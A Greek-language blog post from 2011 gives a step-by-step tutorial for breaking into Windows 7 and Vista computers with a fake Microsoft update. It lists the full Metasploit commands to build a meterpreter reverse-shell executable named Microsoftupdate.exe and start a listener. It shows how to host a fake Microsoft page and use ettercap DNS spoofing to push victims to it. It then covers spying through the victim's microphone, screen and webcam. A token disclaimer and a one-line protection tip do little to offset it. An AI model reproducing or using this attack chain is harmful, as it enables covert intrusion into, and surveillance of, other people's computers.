ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Πέμπτη, 15 Δεκεμβρίου 2011

Πως εισβαλω σε υπολογιστη windows 7 & vista με ψευτικη αναβαθμιση της Microsoft

Με αυτο τον οδηγο θα μπορειτε  πολυ ευκολα  να εισβαλετε σε εναν τοπικο υπολογιστη

Τι θα χρειαστειτε;

1.Backtack 5 R1
2.αυτα τα αρχεια ψευτικη σελιδα microsoft μαζι με την εικονα microsoft logo

-βημα πρωτο φτιαχνουμε τον δουρειο ιππο μας
-ανοιγουμε ενα τερματικο και γραφουμε msfconsole και παταμε enter και περιμενουμε
-μετα γραφουμε back και enter
-μετα γραφουμε msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.64 LPORT=100 x > /var/www/Microsoftupdate.exe παταμε enter και περιμενουμε να μας φτιαξει τον 'ιο' που στην ουσια ειναι ενας διακομιστης που μας ενωνει με τον αλλο υπολογιστη
-μετα γραφουμε use exploit/multi/handler και παταμε enter
-μετα set payload windows/x64/meterpreter/reverse_tcp
-μετα set lhost 192.168.1.64 * η ip μου εσυ βαζεις την δικια σου το ιδιο πριν φτιαξεις τον ιο πιο πανω *
-μετα set lport 100
-τελος exploit  και μας αυτο
[*] Started reverse handler on 192.168.1.64:100
[*] Starting the payload handler...
-βημα δευτερο
-τα αρχεια που κατεβασατε απο εμενα πρεπει να τα μεταφερετε στο /var/www/
-οταν τα εχετε μεταφερει τοτε ανοιξε τον firefox και γραψτε στο url την ip σας
θα πρεπει να σας εμφανιζει αυτο
αν δεν σας εμφανιζει αυτο τοτε πηγαινετε στο /var/www και ανοιξτε το αρχειο index.html  με ghedit και πανω πανω που λεει
<html><head><iframe src ="http://192.168.1.64" width="0" height="0" βαλτε την ip σας το ιδιο και απο κατω...αν δεν σας εμφανιζει και την εικονα τοτε ονομαστε την εικονα microsoft ακριβως οπως το αρχειο που κατεβασατε απο εμενα
-οταν τα εχετε φτιαξει αυτα και δεν τα εχετε κανει μπαχαλο ειμαστε ετοιμοι να προχωρησουμε
-σε αυτο το σημειο αν πατε σε ενα τοπικο υπολογιστη και πατησετε την ip σας στο url θα του εμφανιστει η σελιδα αυτη αλλα το θεμα ειναι πως θα κανετε τον αλλο να παει σε αυτη την σελιδα;
-βημα τριτο
-εδω μας βοηθαει το ettercap βαζουμε στο etter.dns *.*.* Α 192.168.1.64 και ανοιγουμε το ettercap mitm ( δειτε τον οδηγο που εγραψα πως κλεβω κωδικους απο facebook πως το κανετε μην τα ξαναγραφω αμαρτια :P ) και dns_spoof κτλ
-μετα ανοιγουμε ενα τερματικο και γραφουμε cd /var/www παταμε enter
-μετα στο ιδιο τερματικο γραφουμε python -m SimpleHTTPServer 80 και παταμε enter
-τελος περιμενουμε το θυμα μας να ανοιξει τον browser του και να γραψει οτι θελει οταν γραψει θα ανακατευθυνθει στην σελιδα μας και θα κατεβασει το προγραμμα μας το οποιο θα μας ανοιξει μια συνδεση οπως εδω
-γραφουμε help και μας εμφανιζει τις εντολες
-πχ για να ακουσουμε απο το μικροφωνο του γραφουμε record_mic 60 δλδ να ακουμε για ενα λεπτο η για να δουμε τι εχει στην οθονη του γραφουμε screenshot η για να βγαλουμε φωτογραφια με την καμερα του γραφουμε  webcam_snap και παταμε enter
-τελος 

Πως θα προστατευτειτε;
1.Οταν κατεβαζετε αρχεια και πηγαινετε να τα εγκαταστησετε να κοιτατε τον εκδοτη του προγραμματος αν ειναι κοκκινο δεν τα κανουμε εγκατασταση

Δεν υπάρχουν σχόλια: